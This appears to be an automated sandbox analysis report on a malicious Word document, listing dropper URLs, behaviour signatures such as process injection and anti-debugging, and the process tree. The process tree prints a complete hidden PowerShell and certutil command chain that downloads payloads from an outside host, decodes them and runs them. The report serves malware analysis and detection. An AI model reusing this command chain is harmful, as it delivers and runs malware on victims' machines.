Analysis
-
max time kernel
122s -
resource
win7v191014 -
submitted
05-12-2019 20:53
Task
task1
Sample
Docs_92ebafcc950619596e93a4215d05e6cb.doc
Resource
win7v191014
0 signatures
General
Malware Config
Extracted
Language
ps1
Source
URLs
exe.dropper
http://colfev12.site/Bijka.dat
exe.dropper
http://colfev12.site/sfera.dat
exe.dropper
http://colfev12.site/oYWE.dat
Signatures
-
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
WINWORD.EXEconhost.execonhost.exepid process 1516 WINWORD.EXE 1444 conhost.exe 1556 conhost.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 880 powershell.exe Token: SeDebugPrivilege 384 powershell.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exeblow.exepid process 880 powershell.exe 384 powershell.exe 1876 blow.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
blow.exepid process 1400 blow.exe -
Drops file in System32 directory 4 IoCs
Processes:
powershell.exeWINWORD.EXEpowershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File deleted C:\Windows\System32\spool\drivers\x64\3\mxdwdui.BUD WINWORD.EXE File created C:\Windows\system32\spool\DRIVERS\x64\3\mxdwdui.BUD WINWORD.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
description ioc Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName -
Checks for installed software on the system 1 TTPs 34 IoCs
Processes:
description ioc Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack\DisplayName Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall Key enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall Key enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall Key opened \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}\DisplayName Key opened \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}\DisplayName Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore\DisplayName Key value queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\DisplayName Key opened \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1516 WINWORD.EXE -
Suspicious use of SetThreadContext 1 IoCs
Processes:
blow.exedescription pid process target process PID 1876 set thread context of 1400 1876 blow.exe blow.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Drops file in Windows directory 2 IoCs
Processes:
certutil.exedescription ioc process File created (read-only) C:\Windows\cer112F.tmp certutil.exe File deleted C:\Windows\cer112F.tmp certutil.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
powershell.exeblow.exeblow.execmd.exedescription pid process target process PID 384 wrote to memory of 1876 384 powershell.exe blow.exe PID 1876 wrote to memory of 1400 1876 blow.exe blow.exe PID 1400 wrote to memory of 1756 1400 blow.exe cmd.exe PID 1756 wrote to memory of 1680 1756 cmd.exe PING.EXE
Processes
-
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_92ebafcc950619596e93a4215d05e6cb.doc"1⤵
- Suspicious use of SetWindowsHookEx
- Drops file in System32 directory
- Suspicious behavior: AddClipboardFormatListener
-
C:\Windows\system32\cmd.execmd /c powershell -windowstyle hidden -command Import-Module BitsTransfer; Start-BitsTransfer -Source http://colfev12.site/Bijka.dat,http://colfev12.site/sfera.dat,http://colfev12.site/oYWE.dat -Destination \"$env:TEMP\blow.exe\",\"$env:TEMP\dera\",\"$env:TEMP\oYWE.exe\" & certutil -decode %temp%\dera %temp%\dera.exe & powershell -windowstyle hidden -command Set-Location -Path \"$env:TEMP\"; Start-Process blow.exe -ArgumentList dera.exe1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command Import-Module BitsTransfer; Start-BitsTransfer -Source http://colfev12.site/Bijka.dat,http://colfev12.site/sfera.dat,http://colfev12.site/oYWE.dat -Destination \"$env:TEMP\blow.exe\",\"$env:TEMP\dera\",\"$env:TEMP\oYWE.exe\"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Drops file in System32 directory
-
C:\Windows\system32\certutil.execertutil -decode C:\Users\Admin\AppData\Local\Temp\dera C:\Users\Admin\AppData\Local\Temp\dera.exe2⤵
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command Set-Location -Path \"$env:TEMP\"; Start-Process blow.exe -ArgumentList dera.exe2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\blow.exe"C:\Users\Admin\AppData\Local\Temp\blow.exe" dera.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\blow.exe"C:\Users\Admin\AppData\Local\Temp\blow.exe"4⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\blow.exe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "13736575861871489881-16881607701145638119-1445741727-334327988-15014401241888056553"1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "37956094-1825198222-58501999118936678274608593271658810211556128713-1808702404"1⤵
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ef13c2a6-fcdf-474f-b686-be9a419bd5e9
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
-
C:\Users\Admin\AppData\Local\Temp\dera.exe
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
-
memory/1400-9-0x0000000000080000-0x00000000000DD000-memory.dmpFilesize
372KB
-
memory/1400-10-0x0000000000080000-0x00000000000DD000-memory.dmpFilesize
372KB
-
memory/1516-0-0x0000000006500000-0x0000000006504000-memory.dmpFilesize
16KB